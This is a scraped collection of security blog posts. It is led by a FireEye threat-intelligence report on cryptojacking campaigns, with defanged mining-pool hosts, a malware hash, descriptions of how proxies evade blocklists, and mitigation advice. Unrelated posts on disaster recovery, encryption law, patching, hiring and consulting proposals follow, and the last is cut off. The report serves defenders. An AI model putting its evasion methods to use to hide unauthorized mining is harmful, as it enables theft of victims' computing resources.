Incorporation of Cryptojacking into Existing Botnets

FireEye iSIGHT Intelligence has observed multiple prominent botnets such as Dridex and Trickbot incorporate cryptocurrency mining into their existing operations. Many of these families are modular in nature and have the ability to download and execute remote files, thus allowing the operators to easily turn their infections into cryptojacking bots. While these operations have traditionally been aimed at credential theft (particularly of banking credentials), adding mining modules or downloading secondary mining payloads provides the operators another avenue to generate additional revenue with little effort. This is especially true in cases where the victims were deemed unprofitable or have already been exploited in the original scheme.

The following are some real-world examples of cryptojacking being incorporated into existing botnets:

  • In early February 2018, FireEye iSIGHT Intelligence observed Dridex botnet ID 2040 download a Monero cryptocurrency miner based on the open-source XMRig miner.
  • On Feb. 12, 2018, FireEye iSIGHT Intelligence observed the banking malware IcedID injecting Monero-mining JavaScript into webpages for specific, targeted URLs. The IcedID injects launched an anonymous miner using the mining code from Coinhive's AuthedMine.
  • In late 2017, Bleeping Computer reported that security researchers with Radware observed the hacking group CodeFork leveraging the popular downloader Andromeda (aka Gamarue) to distribute a miner module to their existing botnets.
  • In late 2017, FireEye researchers observed Trickbot operators deploy a new module named "testWormDLL" that is a statically compiled copy of the popular XMRig Monero miner.
  • On Aug. 29, 2017, Security Week reported on a variant of the popular Neutrino banking Trojan, including a Monero miner module. According to their reporting, the new variant no longer aims at stealing bank card data, but instead is limited to downloading and executing modules from a remote server.

Drive-By Cryptojacking


FireEye iSIGHT Intelligence has examined various customer reports of browser-based cryptocurrency mining. Browser-based mining scripts have been observed on compromised websites, third-party advertising platforms, and have been legitimately placed on websites by publishers. While coin mining scripts can be embedded directly into a webpage's source code, they are frequently loaded from third-party websites. Identifying and detecting websites that have embedded coin mining code can be difficult since not all coin mining scripts are authorized by website publishers, such as in the case of a compromised website. Further, in cases where coin mining scripts were authorized by a website owner, they are not always clearly communicated to site visitors. At the time of reporting, the most popular script being deployed in the wild is Coinhive. Coinhive is an open-source JavaScript library that, when loaded on a vulnerable website, can mine Monero using the site visitor's CPU resources, unbeknownst to the user, as they browse the site.

The following are some real-world examples of Coinhive being deployed in the wild:

  • In September 2017, Bleeping Computer reported that the authors of SafeBrowse, a Chrome extension with more than 140,000 users, had embedded the Coinhive script in the extension's code that allowed for the mining of Monero using users' computers and without getting their consent.
  • During mid-September 2017, users on Reddit began complaining about increased CPU usage when they navigated to a popular torrent site, The Pirate Bay (TPB). The spike in CPU usage was a result of Coinhive's script being embedded within the site's footer. According to TPB operators, it was implemented as a test to generate passive revenue for the site (Figure 8).
  • In December 2017, researchers with Sucuri reported on the presence of the Coinhive script being hosted on, which allows users to publish web pages directly from GitHub repositories.
  • Other reporting disclosed the Coinhive script being embedded on the Showtime domain as well as on the LA Times website, both surreptitiously mining Monero.
  • A majority of in-browser cryptojacking activity is transitory in nature and will last only as long as the user’s web browser is open. However, researchers with Malwarebytes Labs uncovered a technique that allows for continued mining activity even after the browser window is closed. The technique leverages a pop-under window surreptitiously hidden under the taskbar. As researchers pointed out, closing the browser window may not be enough to interrupt the activity, and that more advanced actions like running the Task Manager may be required.

Figure 8: Statement from TPB operators on Coinhive script

Malvertising and Exploit Kits

Malvertisements – malicious ads on legitimate websites – commonly redirect visitors of a site to an exploit kit landing page. These landing pages are designed to scan a system for vulnerabilities, exploit those vulnerabilities, and download and execute malicious code onto the system. Notably, the malicious advertisements can be placed on legitimate sites and visitors can become infected with little to no user interaction. This distribution tactic is commonly used by threat actors to widely distribute malware and has been employed in various cryptocurrency mining operations.

The following are some real-world examples of this activity:

  • In early 2018, researchers with Trend Micro reported that a modified miner script was being disseminated across YouTube via Google's DoubleClick ad delivery platform. The script was configured to generate a random number variable between 1 and 100, and when the variable was above 10 it would launch the Coinhive script coinhive.min.js, which harnessed 80 percent of the CPU power to mine Monero. When the variable was below 10 it launched a modified Coinhive script that was also configured to harness 80 percent CPU power to mine Monero. This custom miner connected to the mining pool wss[:]//ws[.]l33tsite[.]info:8443, which was likely done to avoid Coinhive's fees.
  • In April 2018, researchers with Trend Micro also discovered a JavaScript code based on Coinhive injected into an AOL ad platform. The miner used the following private mining pools: wss[:]//wsX[.]www.datasecu[.]download/proxy and wss[:]//www[.]jqcdn[.]download:8893/proxy. Examination of other sites compromised by this campaign showed that in at least some cases the operators were hosting malicious content on unsecured AWS S3 buckets.
  • Since July 16, 2017, FireEye has observed the Neptune Exploit Kit redirect to ads for hiking clubs and MP3 converter domains. Payloads associated with the latter include Monero CPU miners that are surreptitiously installed on victims' computers.
  • In January 2018, Check Point researchers discovered a malvertising campaign leading to the Rig Exploit Kit, which served the XMRig Monero miner utility to unsuspecting victims.

Mobile Cryptojacking

In addition to targeting enterprise servers and user machines, threat actors have also targeted mobile devices for cryptojacking operations. While this technique is less common, likely due to the limited processing power afforded by mobile devices, cryptojacking on mobile devices remains a threat as sustained power consumption can damage the device and dramatically shorten the battery life. Threat actors have been observed targeting mobile devices by hosting malicious cryptojacking apps on popular app stores and through drive-by malvertising campaigns that identify users of mobile browsers.

The following are some real-world examples of mobile devices being used for cryptojacking:

  • During 2014, FireEye iSIGHT Intelligence reported on multiple Android malware apps capable of mining cryptocurrency:
    • In March 2014, Android malware named "CoinKrypt" was discovered, which mined Litecoin, Dogecoin, and CasinoCoin currencies.
    • In March 2014, another form of Android malware – "Android.Trojan.MuchSad.A" or "ANDROIDOS_KAGECOIN.HBT" – was observed mining Bitcoin, Litecoin, and Dogecoin currencies. The malware was disguised as copies of popular applications, including "Football Manager Handheld" and "TuneIn Radio." Variants of this malware have reportedly been downloaded by millions of Google Play users.
    • In April 2014, Android malware named "BadLepricon," which mined Bitcoin, was identified. The malware was reportedly being bundled into wallpaper applications hosted on the Google Play store, at least several of which received 100 to 500 installations before being removed.
    • In October 2014, a type of mobile malware called "Android Slave" was observed in China; the malware was reportedly capable of mining multiple virtual currencies.
  • In December 2017, researchers with Kaspersky Labs reported on a new multi-faceted Android malware capable of a variety of actions including mining cryptocurrencies and launching DDoS attacks. The resource load created by the malware has reportedly been high enough that it can cause the battery to bulge and physically destroy the device. The malware, dubbed Loapi, is unique in the breadth of its potential actions. It has a modular framework that includes modules for malicious advertising, texting, web crawling, Monero mining, and other activities. Loapi is thought to be the work of the same developers behind the 2015 Android malware Podec, and is usually disguised as an anti-virus app.
  • In January 2018, SophosLabs released a report detailing their discovery of 19 mobile apps hosted on Google Play that contained embedded Coinhive-based cryptojacking code, some of which were downloaded anywhere from 100,000 to 500,000 times.
  • Between November 2017 and January 2018, researchers with Malwarebytes Labs reported on a drive-by cryptojacking campaign that affected millions of Android mobile browsers to mine Monero.

Cryptojacking Spam Campaigns

FireEye iSIGHT Intelligence has observed several cryptocurrency miners distributed via spam campaigns, which is a commonly used tactic to indiscriminately distribute malware. We expect malicious actors will continue to use this method to disseminate cryptojacking code as for long as cryptocurrency mining remains profitable.

In late November 2017, FireEye researchers identified a spam campaign delivering a malicious PDF attachment designed to appear as a legitimate invoice from the largest port and container service in New Zealand: Lyttelton Port of Chistchurch (Figure 9). Once opened, the PDF would launch a PowerShell script that downloaded a Monero miner from a remote host. The malicious miner connected to the pools and

Figure 9: Sample lure attachment (PDF) that downloads malicious cryptocurrency miner

Additionally, a massive cryptojacking spam campaign was discovered by FireEye researchers during January 2018 that was designed to look like legitimate financial services-related emails. The spam email directed victims to an infection link that ultimately dropped a malicious ZIP file onto the victim's machine. Contained within the ZIP file was a cryptocurrency miner utility (MD5: 80b8a2d705d5b21718a6e6efe531d493) configured to mine Monero and connect to the pool. While each of the spam email lures and associated ZIP filenames were different, the same cryptocurrency miner sample was dropped across all observed instances (Table 2).

ZIP Filenames













Table 2: Sampling of observed ZIP filenames delivering cryptocurrency miner

Cryptojacking Worms

Following the WannaCry attacks, actors began to increasingly incorporate self-propagating functionality within their malware. Some of the observed self-spreading techniques have included copying to removable drives, brute forcing SSH logins, and leveraging the leaked NSA exploit EternalBlue. Cryptocurrency mining operations significantly benefit from this functionality since wider distribution of the malware multiplies the amount of CPU resources available to them for mining. Consequently, we expect that additional actors will continue to develop this capability.

The following are some real-world examples of cryptojacking worms:

  • In May 2017, Proofpoint reported a large campaign distributing mining malware "Adylkuzz." This cryptocurrency miner was observed leveraging the EternalBlue exploit to rapidly spread itself over corporate LANs and wireless networks. This activity included the use of the DoublePulsar backdoor to download Adylkuzz. Adylkuzz infections create botnets of Windows computers that focus on mining Monero.
  • Security researchers with Sensors identified a Monero miner worm, dubbed "Rarogminer," in April 2018 that would copy itself to removable drives each time a user inserted a flash drive or external HDD.
  • In January 2018, researchers at F5 discovered a new Monero cryptomining botnet that targets Linux machines. PyCryptoMiner is based on Python script and spreads via the SSH protocol. The bot can also use Pastebin for its command and control (C2) infrastructure. The malware spreads by trying to guess the SSH login credentials of target Linux systems. Once that is achieved, the bot deploys a simple base64-encoded Python script that connects to the C2 server to download and execute more malicious Python code.

Detection Avoidance Methods

Another trend worth noting is the use of proxies to avoid detection. The implementation of mining proxies presents an attractive option for cyber criminals because it allows them to avoid developer and commission fees of 30 percent or more. Avoiding the use of common cryptojacking services such as Coinhive, Cryptloot, and Deepminer, and instead hosting cryptojacking scripts on actor-controlled infrastructure, can circumvent many of the common strategies taken to block this activity via domain or file name blacklisting.

In March 2018, Bleeping Computer reported on the use of cryptojacking proxy servers and determined that as the use of cryptojacking proxy services increases, the effectiveness of ad blockers and browser extensions that rely on blacklists decreases significantly.

Several mining proxy tools can be found on GitHub, such as the XMRig Proxy tool, which greatly reduces the number of active pool connections, and the CoinHive Stratum Mining Proxy, which uses Coinhive’s JavaScript mining library to provide an alternative to using official Coinhive scripts and infrastructure.

In addition to using proxies, actors may also establish their own self-hosted miner apps, either on private servers or cloud-based servers that supports Node.js. Although private servers may provide some benefit over using a commercial mining service, they are still subject to easy blacklisting and require more operational effort to maintain. According to Sucuri researchers, cloud-based servers provide many benefits to actors looking to host their own mining applications, including:

  • Available free or at low-cost
  • No maintenance, just upload the crypto-miner app
  • Harder to block as blacklisting the host address could potentially impact access to legitimate services
  • Resilient to permanent takedown as new hosting accounts can more easily be created using disposable accounts

The combination of proxies and crypto-miners hosted on actor-controlled cloud infrastructure presents a significant hurdle to security professionals, as both make cryptojacking operations more difficult to detect and take down.

Mining Victim Demographics

Based on data from FireEye detection technologies, the detection of cryptocurrency miner malware has increased significantly since the beginning of 2018 (Figure 10), with the most popular mining pools being minergate and nanopool (Figure 11), and the most heavily affected country being the U.S. (Figure 12). Consistent with other reporting, the education sector remains most affected, likely due to more relaxed security controls across university networks and students taking advantage of free electricity to mine cryptocurrencies (Figure 13).

Figure 10: Cryptocurrency miner detection activity per month

Figure 11: Commonly observed pools and associated ports

Figure 12: Top 10 affected countries

Figure 13: Top five affected industries

Figure 14: Top affected industries by country

Mitigation Techniques

Unencrypted Stratum Sessions

According to security researchers at Cato Networks, in order for a miner to participate in pool mining, the infected machine will have to run native or JavaScript-based code that uses the Stratum protocol over TCP or HTTP/S. The Stratum protocol uses a publish/subscribe architecture where clients will send subscription requests to join a pool and servers will send messages (publish) to its subscribed clients. These messages are simple, readable, JSON-RPC messages. Subscription requests will include the following entities: id, method, and params (Figure 15). A deep packet inspection (DPI) engine can be configured to look for these parameters in order to block Stratum over unencrypted TCP.

Figure 15: Stratum subscription request parameters

Encrypted Stratum Sessions

In the case of JavaScript-based miners running Stratum over HTTPS, detection is more difficult for DPI engines that do not decrypt TLS traffic. To mitigate encrypted mining traffic on a network, organizations may blacklist the IP addresses and domains of popular mining pools. However, the downside to this is identifying and updating the blacklist, as locating a reliable and continually updated list of popular mining pools can prove difficult and time consuming.

Browser-Based Sessions

Identifying and detecting websites that have embedded coin mining code can be difficult since not all coin mining scripts are authorized by website publishers (as in the case of a compromised website). Further, in cases where coin mining scripts were authorized by a website owner, they are not always clearly communicated to site visitors.

As defenses evolve to prevent unauthorized coin mining activities, so will the techniques used by actors; however, blocking some of the most common indicators that we have observed to date may be effective in combatting a significant amount of the CPU-draining mining activities that customers have reported. Generic detection strategies for browser-based cryptocurrency mining include:

  • Blocking domains known to have hosted coin mining scripts
  • Blocking websites of known mining project websites, such as Coinhive
  • Blocking scripts altogether
  • Using an ad-blocker or coin mining-specific browser add-ons
  • Detecting commonly used naming conventions
  • Alerting and blocking traffic destined for known popular mining pools

Some of these detection strategies may also be of use in blocking some mining functionality included in existing financial malware as well as mining-specific malware families.

It is important to note that JavaScript used in browser-based cryptojacking activity cannot access files on disk. However, if a host has inadvertently navigated to a website hosting mining scripts, we recommend purging cache and other browser data.


In underground communities and marketplaces there has been significant interest in cryptojacking operations, and numerous campaigns have been observed and reported by security researchers. These developments demonstrate the continued upward trend of threat actors conducting cryptocurrency mining operations, which we expect to see a continued focus on throughout 2018. Notably, malicious cryptocurrency mining may be seen as preferable due to the perception that it does not attract as much attention from law enforcement as compared to other forms of fraud or theft. Further, victims may not realize their computer is infected beyond a slowdown in system performance.

Due to its inherent privacy-focused features and CPU-mining profitability, Monero has become one of the most attractive cryptocurrency options for cyber criminals. We believe that it will continue to be threat actors' primary cryptocurrency of choice, so long as the Monero blockchain maintains privacy-focused standards and is ASIC-resistant. If in the future the Monero protocol ever downgrades its security and privacy-focused features, then we assess with high confidence that threat actors will move to use another privacy-focused coin as an alternative.

Because of the anonymity associated with the Monero cryptocurrency and electronic wallets, as well as the availability of numerous cryptocurrency exchanges and tumblers, attribution of malicious cryptocurrency mining is very challenging for authorities, and malicious actors behind such operations typically remain unidentified. Threat actors will undoubtedly continue to demonstrate high interest in malicious cryptomining so long as it remains profitable and relatively low risk.

When Disaster Comes Calling

There are times like this when I can’t help but wonder about disaster recovery plans. A large number of companies that I have worked at or spoken with over the years seemed to pay little more than lip service to this rather significant elephant in the room. This came to mind today while I was reading about the storm that ran roughshod over Toronto. In the midst of all the flooding I read about the servers at Toronto’s Pearson airport (YYZ).They had become, well, rather wet. There was “flooding in server rooms.” according to their tweet July 8th at 9:16 pm.

This really got me thinking as to how this could have happened in the first place.

At one organization that I worked for the role of disaster recovery planning fell to an individual that had neither the interest nor the wherewithal to accomplish the task. This is a real problem for many companies and organizations. The fate of their operations can, at times, reside in the hands of someone who is disinclined to properly perform the task.

Of course this is not a truism of every company. But, there are many instances where it is the sheer force of will of the staff needed to restore service in the event of an outage. One company that I had worked for suffered an SAP outage that made it such that invoices could not be paid. The impact of this was a massive financial burden and it took the better part of a month to sort out. There was no disaster recovery plan. There was no system back up. There was no failover. In this case the DR plan was not even in existence. Through the Herculean efforts of the staff, invoices were paid manually.

A second example that I can’t help but pull from the archives was when I was working for a certain power company. It was the end of the day and I was heading for the door with my coworker. We came upon our head of IT operations and one of the building security guards working feverishly to contain a water leak in the janitorial closet. The faucet would not close. We dropped our bags and pitched in to help.

In relatively short order the tap sheered off from the wall and the real flooding began. The difficulty that presented itself in short order was that the main water shut off valve was no where to be found. There was no disaster recovery plan that covered this contingency. To make matters worse, the computer control room was located on the floor directly below the janitor closet.

Um, yeah.

Ultimately the situation was resolved and the control room was saved. But, it should have never gotten to that point.

So what is the actionable take away to had from this post? Take some time to review your organizations disaster recovery plans. Are backups taken? Are they tested? Are they stored offsite? Does the disaster recovery plan even exist anywhere on paper? Has that plan been tested with the staff? No plan survives first contact with the “enemy” but, it is far better to be well trained and prepared than to be caught unawares.

Even if you’re not directly involved with the plans in your shop be sure to ask the question. Are we prepared?

Originally posted on CSO Online by me.

The post When Disaster Comes Calling appeared first on Liquidmatrix Security Digest.

By targeting encrypted content, Australia threatens press freedom

Jole Aron

The Australian government is considering legislation that would endanger source protection, confidential reporting processes, and the privacy of everyone in an ill-conceived effort to grant law enforcement easier access to electronic communications.

Freedom of the Press Foundation has joined a group of digital rights organizations in calling for the Australian government to refrain from any effort to weaken access to encrypted communication services. “We strongly urge the government to commit to not only supporting, but investing in the development and use of encryption and other security tools and technologies that protect users and systems,” the open letter to Australian officials states.

While it has not yet introduced such legislation, the government has reiterated its intention of doing so consistently over the past year. In July 2017, Australian Prime Minister Turnbull and Attorney General George Brandis held a press conference at which they initially stated their intention to force communications companies to comply with law enforcement decryption efforts. Months later, the foreign minister said legislation intending to work with communication providers to stop terrorism was imminent.

It’s unclear what this legislation will look like, but communication companies or device makers could face significant government fines if they refuse to assist law enforcement with accessing users’ data. This could apply not only to Australian telecommunications companies like Telstra and Optus, but also to huge, internationally-based tech companies like Facebook and Apple.

If companies have the ability to decrypt their users’ data and hold their private encryption keys, those companies could be forced to provide confidential communications anytime the government deems access necessary. Taylor has claimed there will be no requirements for companies to build “backdoors” into their products for law enforcement, but the alternative to undermining encryption itself is to target physical devices.

This is one of the fears of Nathan White, Senior Legislative Manager at Access Now. He is concerned that rather than compelling WhatsApp or Gmail to provide access to encrypted content, the legislation will force device manufacturers to push targeted malware to the devices of people who are the subject of investigations.

Regular software updates are critical to the security and privacy, because they often fix vulnerabilities and introduce new protections. Laws that could force a company like Apple to target a user’s device with malware would eradicate trust between device makers and their users in software updates. The government could hypothetically demand malware to be sent to the devices of journalists, sources, or activists, and use confidential communications acquired through targeted malware to prosecute or investigative them.

Australian Attorney General George Brandis called encryption “potentially the greatest degradation of intelligence and law enforcement capability” in a lifetime. He has indicated that the new laws would be akin to the United Kingdom’s Investigatory Powers Act, and would grant the government the ability to force companies to comply with investigations.

It’s a chilling comparison to make. The Investigatory Powers Act is one of the world’s most Orwellian and sweeping surveillance laws, which authorizes the blanket collection, monitoring, retention of citizens’ communications and online activity.

Australia is also part of the powerful “Five Eyes” intelligence alliance that includes the United Kingdom, United States, New Zealand, and France. The adoption of laws that use broad “terrorism” claims to justify weakening of encryption or targeting of devices could open the door not only to similar legislation in other countries and even normalize international sharing of decrypted sensitive data. (Australia is also hosting a Five Eyes meeting in August, where these legislative efforts could be discussed.)

It’s unclear what this legislation will look like, or when it will be introduced, but the government’s efforts will be met with widespread opposition when it does so. Any laws that threaten software updates or encryption would threaten the privacy of everyone in Australia, and set a disturbing precedent for governments and intelligence agencies around the world.

Never patch another system again

Over the years I have been asked a curious question numerous times. ‘If we use product x or solution y we wouldn’t have to patch anymore, right?” At this point in the conversation I would often sit back in my seat and try to look like I was giving their question a lot of thought. The reality was more pragmatic. I was trying very hard to stifle my screams while appearing considerate of their query.

Let’s be honest with ourselves. No one likes to apply patches. If that were the opposite I have little doubt that we would have far fewer data breaches than we read about in the news these days. I’m sure that there is a mythical unicorn out there that simply lives for this sort of activity. I will be entirely honest when I say that I have never met this person.

Applying patches is a very necessary activity. So, why is it that we continually have to return to this discussion point? Time and again we read in the press about companies that were compromised because of a missed patch or configuration error. One of the things that I do a fair bit is to read the data breach notices that companies issue. There are some trends that are inescapable. A piece of software wasn’t patched to current. There was a configuration error or a laptop was stolen but, have no fear, there was a password.

Two of the aforementioned were easily preventable situations and the third…well, I’ll just leave that one alone for this post.

Let’s just dispense with the nonsense. There is no product on this little blue marble that we call home that will ever give you 100% security. It just isn’t going to happen. Full stop. There are so many moving parts in the modern IT ecosystem that we have to take this in to account. There is a real problem that we seem to drift farther and farther from each and every day. We are failing to tackle the fundamentals well and as a result the security of our digital supply chain is suffering.

I often get teased by some friends for using the phrase “defined repeatable process”. This idea is absolutely nothing new. This is a term that has been floating around for a long while now but, we seem incapable of implementing them. Why is that? When we drift away from doing things well, such as patching, we are inadvertently increasing our technical security debt. As this chasm continues to widen there will come a point after which most organizations would not be able to pivot to the safety of higher ground.

So as I knock this idea around in my head I continue to wonder what it is that we can do to improve things from a repeatable process standpoint.

Go ahead and put up your feet on your desk basking in the glow of knowledge that some vendor is going to solve all of your security issues. Never patch another system again and we shall gleefully dance around the smoldering crater that was once your enterprise network after the hordes of attackers are done savaging it.

An apple a day keeps the doctor away and all that sort of rot.

Originally posted on CSO Online by me.

The post Never patch another system again appeared first on Liquidmatrix Security Digest.

InfoSec Recruiting – Is the Industry Creating its own Drought?

The InfoSec industry has a crippling skills shortage, or so we’re told. There’s a constant stream of articles, keynotes, research and initiatives all telling us of the difficulty companies have in finding new talent. I’ve been in the industry for over 30 years now and through my role as one of the directors of Security BSides London, I often help companies who are struggling to grow their teams. More recently, my own circumstances have led me to once again join the infosec candidate pool and go through the job hunt and interview process.

I have been in the position of hiring resources in the past and understand that it is not easy and takes time. But having sat through a few interviews of my own now, I am beginning to wonder if we have not brought this situation upon ourselves. Are the expectations of recruiters out of proportion? Are they expecting to uncover a hidden gem that ticks every single box? Is it really true that the infosec talent pool is running empty, or is it that the hiring process in the industry is creating its own drought?

Part of this situation may be coming from the way hiring managers are questioning candidates. There is no perfect questioning methodology, but today, focusing purely on technical questions cannot be a good solution because – LMGTFY – even fairly lazy candidates can study and prepare for any technical questions beforehand. It might seem obvious that a hiring manager needs to look at a wider scope, evaluating the candidate’s ability to learn, adapt, and demonstrate their analytic or creative capabilities, but this is the part that seems to be missed.

I’ve found that candidate questioning within some organisations has become vague and far too open-ended to provide a meaningful evaluation. For example, I recently was asked – and know of a few other people who were asked – the open-ended question: “What happens when you use a browser?”. I won’t go into the pros and cons of this specific question in the hiring process as it is quite well covered in the post: The “What happens when you use a browser?” Question from Scott J Roberts.

This type of question can be answered in so many ways, from a high level overview to the nuts-and-bolts. And when the candidate has been building networks before the Internet was really a thing and was probably already working before the hiring manager was born, they’re unlikely to simply guess which response they should give. Exchanging with and discussing the situation with the candidate resembles the normal process of working and analysing the situation to achieve a target.

Now that I have experienced this type of questioning first-hand, I’ve been dumbfounded as to the total lack of interactivity from the hiring manager across the table. My natural reaction to an unclear, vague or unspecific question is to question it; discuss and clarify to identify a common ground and answer in a more appropriate way. The problem lies in that the hiring manager typically won’t engage at all, simply stating that it is an “open-ended question and to answer how I feel best”. How can this be a constructive way to gauge a candidate’s abilities?

I’ve always taught and been taught that asking questions is a good thing because it demonstrates logical and analytical thinking and shows that you are trying to better understand the situation and audience and react with the most appropriate response. If a hiring manager simply pursues a vague line of questioning they’ll only ever be able to evaluate a candidate by taking a subjective decision. I’ve even heard reports that hiring managers have rejected a candidate on the basis that they felt the person would outshine them.

In people management, one of the rules that you learn is that you need to evaluate performance based on attainable and measurable indicators. I propose this needs to be the same for the hiring process so that the hiring manager can make a meaningful decision.

Ultimately, interviewing a candidate on the principles of discussion, exchange and analytic capabilities will help the hiring manager identify the right person. It’s important to assess whether the person has a good foundational skill set that allows them to analyse and understand the work that needs to be performed. A good candidate not only needs the technical competencies but also the softer skills that help them adapt, learn and acquire the broader capabilities needed to successfully integrate a team. Onboarding and probationary periods are there to allow a team to conduct a final check of the candidate’s technical and soft skills.

So what needs to change? I believe hiring managers need to ask themselves whether searching for that golden needle in the haystack is the most effective way to identify and recruit talent. By changing the perspective that the interview process should be more of a constructive discussion instead of vague and rigid Q&A, companies will get a better view of how that candidate might actually work on the ground. And by adapting questions to the level of experience in front of them, they are likely to see much more potential from every candidate that they engage with. Sure, the infosec talent pool might not be overflowing, but maybe our skills shortage isn’t quite as terrible as we might think.

The post InfoSec Recruiting – Is the Industry Creating its own Drought? appeared first on Liquidmatrix Security Digest.

Welcoming the Conversational Economy | Securing the Voice Channel

In our latest study, 500 IT and business leaders across the US, France, Germany, and the UK were surveyed to find 85 percent of businesses expect to use voice technology in the next year despite significant security fears. Coming together to create a “Conversational Economy,” 28 percent of businesses currently communicate with customers via voice technology including Microsoft’s Cortana and Amazon’s Alexa voice assistants. In this new ecosystem, voice is dominating all other interfaces and enterprises are moving quickly to adapt.

The number of businesses to utilize voice to interact with their customers will triple, with over two-thirds planning to use voice for the majority of interactions, and nearly one fourth to use voice for all interactions in the next five years. Additionally, respondents reflected not only a growing trust in voice technology’s growing capabilities, but also various ambitious enterprise voice plans:

Enterprises are taking a considered approach when examining and deciding which assistant would fit into their business processes – even though Amazon’s Alexa has ruled headlines.

Though businesses seem to be welcoming voice technology with open arms, there are also high levels of concern (80 percent) regarding the ability for businesses to keep the data acquired through voice-based technology safe. The concern for securing voice as an interface is one of the main factors determining how quickly the conversational economy will grow.

Vijay Balasubramaniyan, CEO and Co-founder, Pindrop, said: “People’s security, identity, and therefore the wider Conversational Economy, is at stake as its use increases. If businesses intend to use voice technology for the majority of customer interactions in the near-future they need to make sure that this method of interaction is as secure as any other.”

Learn more here.

The post Welcoming the Conversational Economy | Securing the Voice Channel appeared first on Pindrop.

How to Get Paid for Proposals

Proposals are one of the most expensive things you will spend your time on in a small business (or a large business, for that matter). You not only spend tons of time discovering and understanding what the client needs, but you also spend countless hours (often late at night) putting the proposal together, polishing it, tweaking the numbers and creating a whiz-bang presentation to accompany the proposal.

All of that for free, and often for nothing.

I’m very much against charging by the hour, but in this case calculating your effective hourly rate is a good exercise:

Let’s say that you recently landed a project and you’re going to make $10,000 from it. You’re going to spend 50 hours delivering the project so you’re earning $200 per hour (this is your billable rate). Easy calculation. But when you figure in the time that you spent on putting the proposal together – lets say another 20 hours – you’re only generating around $142 per hour, or a 25% drop in your effective hourly rate. Add in the other non-billable time you spent with the client and you’re easily pushing your effective hourly rate – for that project – down below 50% of your billable rate.

Pushing your effective hourly rate down is of course not the only bad thing that happens.

It breaks my heart

You put your heart and soul into understanding what the client really needs, give them the benefit of your experience to make sure they don’t fall into traps and put a lot of thought and effort into how you can help them solve their business problem. You’re invested – both in time and in emotional energy.

So when they turn you down, there’s a double whammy. You’ve just done a lot of work for nothing and you’ve just had your emotional investment kicked in the face (or that’s how it feels, at least at first). That hurts – especially when you’re new to the game. Over time you learn that opportunities come and go and you get less emotionally invested, but each time a proposal doesn’t hit the mark you take an emotional hit.

But what if there’s a better way? What if you could actually get paid for your proposals? And have your client like it that way?

There is a way to do this, and it starts with understanding the value of the proposal.

Proposals are valuable

By the time a client asks you to put together a proposal, you’ve already been dancing for a while. You’ve had some initial meetings, a couple of discovery sessions and they like what they see.

Now they ask you to do a proposal, and you’re going to have to spend more time with them. You need to make sure you understand exactly what they need, how much you can get done within their budget, what takes priority and where the skeletons are. You’re going to apply your expertise to dig into details, find out what else needs fixing and so on…the point is you’re going to spend more time with them.

Then you head off to your cave, put together the proposal and present it to them. And they say thanks, great work, we’ll get back to you. So far so good.

How much value did your potential client get from this proposal development process? The answer is: a lot.

They’ve just had an expert analyse their problem, dig into the details and tell them what they need to do to solve the problem. They now understand their problem a lot better and know what needs to be done to fix it (even if they don’t have the expertise to do it themselves). And of course you may not be the only one submitting a proposal, so the client has received a lot of valuable advice – from multiple experts.

And you gave it to them for free.


Think about it this way: when you go to a doctor with a complaint, they will diagnose you, maybe run some tests, make some recommendations and perhaps prescribe some medicine. Then they’re going to ask you to come in for an extended treatment or checkup to see if things have improved. And you’re happy to pay for this initial consultation.

When you develop a proposal for a client, you’re effectively doing what a doctor does in an initial consultation. You’re listening to the “patient”, running some tests to find out if there’s a deeper cause for the problem, and applying your expertise to recommend a way to get rid of the problem.

You’ve provided a lot of value, but you’re willing to give it away for free because that’s the way your industry usually works. Doctors don’t work like this; they charge for the “proposal” phase of their work with you.

The first key in moving from free to paid proposals is to understand that your proposal is tremendously valuable to your client.

But you need to present it to them as something valuable; and you need to deliver that value. The way to do that is to provide a roadmap.

The differences between a proposal and a roadmap

A proposal is usually a document that defines a scope of work, the number of hours required to do it and a price. If you’ve been at this for a while you will know that you need to base the proposal on the client’s ROI (Return On Investment) – what they get in return for their investment in your services.

A roadmap is also a document, but in this case the document clearly spells out what the client will need to do (or get done first), second and so on. A roadmap sometimes includes a timeline to help the client understand how long the whole process could take. Again, justifying the business case is critical to help the client make the right decision.

A roadmap is the output of one or more roadmap sessions. A roadmap session is like a discovery session, but includes co-development of the roadmap.

If you’re familiar with project planning, you will already have noticed that a roadmap is a high-level project plan.

But there are more differences between a proposal and a roadmap:


When you follow the proposal route of getting work, your engagement with the client looks something like this:

  • initial meeting to see if there’s a fit (make sure you can you help them);
  • a series of meetings to discover what they really need;
  • crafting the proposal;
  • (if you’re experienced) working with the client on the draft proposal to make sure you’re hitting the mark;
  • presenting the final proposal to them; and
  • hoping for the best.

When you use the roadmap route, the engagement looks a little different:

  • initial meeting to see if there’s a fit (can you help them);
  • present the roadmap option (standard for each client); and
  • hope for the best.


Your client can do only one thing with a proposal: say yes or no (or haggle a bit). A roadmap is something they can use; on their own, with you or with someone else:

  • A proposal effectively says “here stuff I will do for you”. A smart proposal says “here’s how I will solve your problem and here’s the ROI”.
  • A roadmap says “here’s where you need to get to, here’s the road you need to follow and here are the stops along the way. You can use this roadmap on your own, with me or with someone else.”


Saying yes to a proposal is a big step, because it usually requires the client to make a big financial investment. The risk for the client is high and their objections will reflect that.

Saying yes to a roadmap exercise is a much smaller commitment. My roadmap sessions typically run for half a day (usually with a couple of hours before and after) and therefore cost a lot less. Much easier for the client to say yes to this much smaller investment.

A difference in how they perceive your expertise

When you present a roadmap option you are clearly placing yourself in charge of the situation. You know exactly how you’re going to go about building the roadmap, you have a defined process and the confidence to present this as the right option for the client. (This is why the client is hiring you in the first place: you are the expert, you know how this should be done and you know exactly how to go about doing it.)

When you present a proposal, you are to some extent asking the client to approve not just the expenditure, but also to make a judgment on whether this is the right thing to do. You’ve given up some control of your expertise.

A difference in the amount of time involved

The proposal route is a big investment (in time) for you and for your client. It is not uncommon to spend tens or even hundreds of hours on discovery meetings, user requirements analysis and proposal polishing for a large contract. A roadmap approach, on the other hand, is a lot smaller investment for you and for your client. You’ve spent maybe two or three hours with the client and then it’s up to them to decide.

(There are more differences, for example the idea that a roadmap is a collaborative exercise versus a proposal which is something you give to the client, but I think you get the point.)


None of my roadmaps contain pricing. The whole idea is that the client can use the roadmap now, later, on their own, with me or with someone else – so I don’t want them to confuse the roadmap with a proposal. Where appropriate, I will send a proposal for some or all of the work in the roadmap; the proposal can be very short because the heavy lifting has already been done in the roadmap.

So how do you move from (free) proposals to (paid) roadmaps?

To get a client to pay for a roadmap, you have to deliver value. That value comes from three places:

  • the roadmap itself: the output of the roadmap session(s) – a tool the client can use;
